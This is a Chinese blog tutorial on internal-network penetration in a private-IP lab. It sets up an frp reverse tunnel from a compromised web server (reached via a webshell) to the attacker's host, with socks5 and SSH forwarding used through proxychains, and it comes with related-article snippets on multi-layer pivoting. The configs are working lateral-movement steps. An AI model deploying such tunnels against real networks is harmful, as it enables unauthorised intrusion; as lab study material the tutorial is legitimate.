内网渗透--frp代理设置与proxychains代理设置

最新推荐文章于 2024-06-20 20:09:06 发布
最新推荐文章于 2024-06-20 20:09:06 发布
阅读量1w 收藏 1
点赞数
文章标签: 网络 服务器 运维 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43267605/article/details/130685621
版权

标题内网渗透–frp代理设置与proxychains代理设置

内网服务器内网IP地址外网IP地址
内网web服务器(windows 7)192.168.52.143192.168.213.138
内网域控服务器192.168.52.138
外网服务器外网IP地址外网V8网卡
外网kali192.168.213.132
外网windows攻击机192.168.0.137192.168.213.1

frps服务端配置

修改外网windows11主机上的frps.ini文件为:
在这里插入图片描述

[common]
bind_port = 7000                     # 外网监听端口

启动监听:

./frps -c ./frps.ini

在这里插入图片描述

frpc客户端配置

将经过修改的windows版本的frp通过蚁剑终端上传到wen服务器上
在这里插入图片描述

[common]
server_addr = 192.168.0.137                 # 外网windows地址
server_port = 7000                          # 外网监听端口

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000
 
[socks5]                                   # socks5代理设置,kali使用该代理加入战斗
type = tcp
plugin = socks5
remote_port = 5000

frp连接建立

客户端主动启动链接

frpc.exe -c frpc.ini

在这里插入图片描述
服务端的外网window11连接成功
在这里插入图片描述

kali socks 代理连接

由于刚刚在frpc客户端配置文件中写入了socks5代理,此时我们可以使用kali中的proxychains,设置socks5代理加入网络中
只需修改 /etc/proxychains4.conf 文件的最后一行就可以了
在这里插入图片描述

socks5 192.168.213.1 5000        # 192.168.213.1是外网win11的v8网卡地址

这样,我们就可以通过kali和自己的win11主机发动对内网的攻击了

雀影
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
frp代理工具流量分析
热爱学习,喜欢折腾!
09-26 1368
frp主要由客户端(frpc)和服务端(frps)组成,服务端通常部署在具有公网 IP 的机器上,客户端通常部署在需要穿透的内网服务所在的机器上。内网服务由于没有公网IP,不能被非局域网内的其他用户访问。用户通过访问服务端的 frps,由 frp负责根据请求的端口或其他信息将请求路由到对应的内网机器,从而实现通信。
proxychains-proxychains-4.2.0.tar.gz
07-09
proxychains可以让命令通过指定的proxy访问网络.proxychains-proxychains-4.2.0.tar.gz
使用frp实现多层代理
xhscxj的博客
08-02 972
上传frps到pc1上,上传frpc到pc2上,在pc1开启一个frp服务端,pc2开启客户端,将pc2的流量转发到pc1上。此时流量已经可以从pc1中转到pc2,咱们只需要在本地上再设置一个二层代理到pc1的frps服务端就可以访问33网段了。因为用mvc所以就不新建文件了,直接修改index.php然后访问tag让他自动加载tag/index.php就好。配置frpc.ini,将pc2的5556端口映射到pc1的7002端口上。先扫一下目录,扫目录的同时去网上找一下这个cms的漏洞。
FRP内网穿透及多级代理的使用
最新发布
imtech的博客
06-20 1199
今天借着proxifier和一个复杂一点的场景测试一下frp的基础功能和多级代理功能。其实我在某视频网站发过一次视频,由于水平有限没多少播放量,而且时间长了自己都忘了某些细节,所以今天用文字记录一下。下图是测试场景,比如渗透测试过程中黑客利用了S1对外映射的某Web服务的漏洞,通过该漏洞上传了webshell,控制了S1。这时候就想通过其他方式连接该服务器,比如3389端口,或者把S1当成跳板来进行横向渗透S2。这种情况下就可以使用frp最基础的功内网穿透。
内网穿透(frpproxychains4)
一大口木的博客
11-13 1508
kali当frp服务器,kali克隆当客户端,客户端在配置文件里设置好自己开放的服务端口,客户端主动利用服务器开放自己的内网(全程ubuntu配好网络后就不用动),这时候,攻击机kali可以通过socks5搭建的隧道,使用proxychains连接访问。kali是外网的一台攻击者,win7在内网,而红帽在win7和kali的中间,也就是右手连接着外网(kali),左手连接着内网(win7)。输入这条命令阔以出现win7的80服务,我win7上下载的小皮,默认的网站我设置的4个1111。
frp隧道(流量代理
weixin_58954236的博客
10-14 922
查看frp服务端的配置文件,当启动frp服务端的时候默认开启7000端口和客户端连接。frp服务(vps)的4444端口会主动转发(通过7000端口)给客户端设定接收流量的端口。失陷主机运行木马后将流量数据包发送给vps的4444端口,但是vps没有开放4444端口。frp存在客户端和服务端,frp服务运行起来后服务端会自行开放7000端口。frps和frpc做好链接后内网IP和vps7.7.7.7就建立了一个隧道。进入frp_0.33.0_linux_amd64目录查看客户端配置信息。
frp多层内网隧道搭建 proxychainsproxyfier多层代理详细设置
qingan6的博客
05-16 4477
点击Proxychains 右边create将代理链按顺序从proxy servers里按住依次拖下,我这里起的名字代理链,都要拖在你起的这个名字(我这里是代理链)里,注意在同一级,如图所示。我们想访问192.168.54.0此时需要搭建第二层隧道。此时我们可以访问192.168.54.0这个网段了。此时我们可以访问192.168.52.0这个网段。按照这种方式不断搭建隧道,无论多少层我们都能访问。再增加一个代理,这里是设置的第二层代理。例如找到进程为 6666。可以访问93这个网段了。
frp内网代理
weixin_43833725的博客
06-12 1670
frp 内网穿透
proxychains-ng-4.16.tar.xz
07-07
ProxyChains是Linux和其他Unix下的代理工具。 它可以使任何程序通过代理上网, 允许TCP和DNS通过代理隧道, 支持HTTP、 SOCKS4和SOCKS5类型的代理服务器, 并且可配置多个代理ProxyChains通过一个用户定义的代理...
第70天:内网安全-域横向内网漫游Socks代理隧道技术1
08-03
在Linux系统中,通过proxychains配置代理,访问其他内网目标。 这些案例展示了内网穿透代理隧道技术在实际安全测试和攻防中的应用。它们不仅可以用于解决内网通信问题,还能在合法授权的情况下,帮助系统管理员进行...
proxychains-ng-4.14.tar.xz
10-09
ProxyChains HowTo (README) Public Forum ProxyChains project page at SourceForge Ezine articles about proxy servers (kind of humor) Proxy server search (try 1080 or 8080) About proxychains tool: * It'...
proxychains-4.5.tar.bz2
08-03
教程博客:https://blog.csdn.net/qq_43017750/article/details/107769679 转存源码包仅为帮助无法访问对应网站的网友进行下载,如有侵权请联系删除。
使用EW作Socks5代理进行内网渗透1
08-03
1. 如何使用EW做反向Socks5代理 2. 浏览器如何设置Socks5代理访问目标内网Web服务 3. 利用proxychains给终端设置Socks5代理
proxy-chain:代理服务器的Node.js实现(认为是Squid),支持SSL,身份验证和上游代理链接
04-28
身份验证和代理链接配置是用代码定义的,可以是动态的。 请注意,代理服务器仅支持基本身份验证(有关详细信息,请参阅 )。 例如,如果您需要在无头的Chrome网络浏览器中使用带有身份验证的代理,则此包很有用,...
使用Earthworm (EW) 做Socks5代理
01-09
正向代理 1.选择合适的ew文件(将文件ew_…改为ew.exe,为了在命令行少敲几个字母),上传到边缘服务器 2.边缘服务器输入 ...3此时攻击机3389仍然不能访问,可借助proxychains(kali自带)配置攻击机整台机器的代理
ProxyChainsGUI-开源
07-02
- **配置文件**:如`proxychains.conf`,包含代理服务器设置信息。 - **可执行文件**:编译后的程序,可以直接运行。 - **文档**:包含使用指南、开发文档等,帮助用户理解和使用ProxyChainsGUI。 - **依赖库**:...
利用Nginx+Frp搭建HTTP正向代理
weixin_30951231的博客
05-04 2105
1.工具:     一台具有公网IP的服务器Frp; Nginx; SwitchySharp浏览器插件; 2.操作步骤  配置具有公网Ip的服务端:Frps配置:文件路径“frp\frps.ini” [common] bind_port = 7000 #服务器端口 dashboard_addr = 0.0.0.0 #仪表板监听地址 dashb...
FRP代理搭建
buffedon的博客
07-08 4430
FRPFRP搭建服务器端客户端登录VPS验证总结参考 FRP搭建 frp 是一种快速反向代理,是一个隧道工具,可帮助您将 NAT 或防火墙后面的本地服务器暴露给 Internet。 截至目前,它支持TCP和UDP,以及HTTP和HTTPS协议,其中请求可以通过域名转发到内部服务。 服务器端 1.下载命令 wget https://github.com/fatedier/frp/releases/download/v0.37.0/frp_0.37.0_linux_amd64.tar.gz 2.解压缩命令 t
使用frp代理本地机器到公网
白食易的专栏
07-04 523
使用frp代理本地机器到公网 首先购买一个最最便宜的服务器 突发性能即可(双十一大优惠更好) (我安装的是CentOS 7.2 网络按流量) [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KnpsBWiI-1593854963395)(…/image/aliecs.jpg)] 安装docker 网上教程很多 比如:https://www.jianshu.com/p/781da23f1b37 #!/bin/sh docker ps if [ $? -eq 127 ];then
centos7 设置代理以及永久设置代理
02-07
在 CentOS 7 中设置代理可以通过修改环境变量或者使用工具来实现。 1. 修改环境变量: - 打开终端,输入命令 `vi /etc/profile` 。 - 在文件末尾添加如下内容: ``` http_proxy=http://proxy_ip:proxy_port https_proxy=http://proxy_ip:proxy_port ftp_proxy=http://proxy_ip:proxy_port no_proxy=localhost,127.0.0.1 ``` - 保存退出。 - 使用命令 `source /etc/profile` 生效。 2. 使用工具: - 安装 `proxychains` ,输入命令 `yum install proxychains` 。 - 修改配置文件 `vi /etc/proxychains.conf` ,将代理地址和端口填入。 - 使用命令 `proxychains4 [命令]` 来使用代理。 如果需要永久设置代理,可以将第 1 步中的配置添加到 `/etc/bashrc` 或者其他配置文件中。 注意,以上方法只对当前终端有效。如果你需要对所有终端生效,请添加到 /etc/bashrc 或 /etc/environment 文件中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值